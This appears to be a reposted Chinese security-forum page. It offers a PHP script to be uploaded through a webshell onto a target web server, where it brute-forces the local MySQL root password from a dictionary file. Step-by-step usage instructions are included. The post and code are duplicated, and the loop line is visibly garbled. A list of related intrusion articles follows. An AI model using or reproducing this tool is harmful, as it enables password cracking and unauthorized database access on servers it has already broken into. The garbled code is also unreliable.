您现在的位置是:网站首页> 编程资料编程资料
PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口_脚本攻防_网络安全_
2023-05-24
163人已围观
简介 PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口_脚本攻防_网络安全_
传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到5000以上时,准确率0%,明明正确……
set_time_limit(0); //脚本不超时
$user="root"; //用户名
$passwd=file("password.txt"); //密码字典
for($i=0;$i$pass=$passwd[$i];
connect($user,$pass);
flush();
}
echo "扫描结束!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "得到密码:".$pass."!!!";
exit();
}
else {
echo $pass.'
';
}
}
?>
代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。
已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到5000以上时,准确率0%,明明正确的密码,却不显示正确,除非你把这个密码放在字典最末尾,才显示正确,不清楚是什么原因造成的,开始以为是暴破间隔时间太短,加了延时函数,还是这样。。。
或许只是我个别原因?各位试试就知道了。
用法:
1、修改 PHP 代码中的用户名
2、准备字典 password.txt,每行一个,理论上支持无数行。
3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。
复制代码
代码如下:set_time_limit(0); //脚本不超时
$user="root"; //用户名
$passwd=file("password.txt"); //密码字典
for($i=0;$i
connect($user,$pass);
flush();
}
echo "扫描结束!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "得到密码:".$pass."!!!";
exit();
}
else {
echo $pass.'
';
}
}
?>
代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。
已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到5000以上时,准确率0%,明明正确的密码,却不显示正确,除非你把这个密码放在字典最末尾,才显示正确,不清楚是什么原因造成的,开始以为是暴破间隔时间太短,加了延时函数,还是这样。。。
或许只是我个别原因?各位试试就知道了。
用法:
1、修改 PHP 代码中的用户名
2、准备字典 password.txt,每行一个,理论上支持无数行。
3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。
相关内容
- 设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等_脚本攻防_网络安全_
- MSSQL 2005 入侵提权过程分享_脚本攻防_网络安全_
- BOSSI 公司企业网站管理系统注入&上传漏洞利用_脚本攻防_网络安全_
- mysql注入导库脚本代码_脚本攻防_网络安全_
- PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码_脚本攻防_网络安全_
- 万博企业网站管理系统注入漏洞(MemberLogin.asp)_脚本攻防_网络安全_
- PHP Webshell 下的端口反弹方法_脚本攻防_网络安全_
- XSS漏洞报告_脚本攻防_网络安全_
- 手工注入方法,方便大家测试程序漏洞_脚本攻防_网络安全_
- 网站被SQL注入防范(WebKnight)_脚本攻防_网络安全_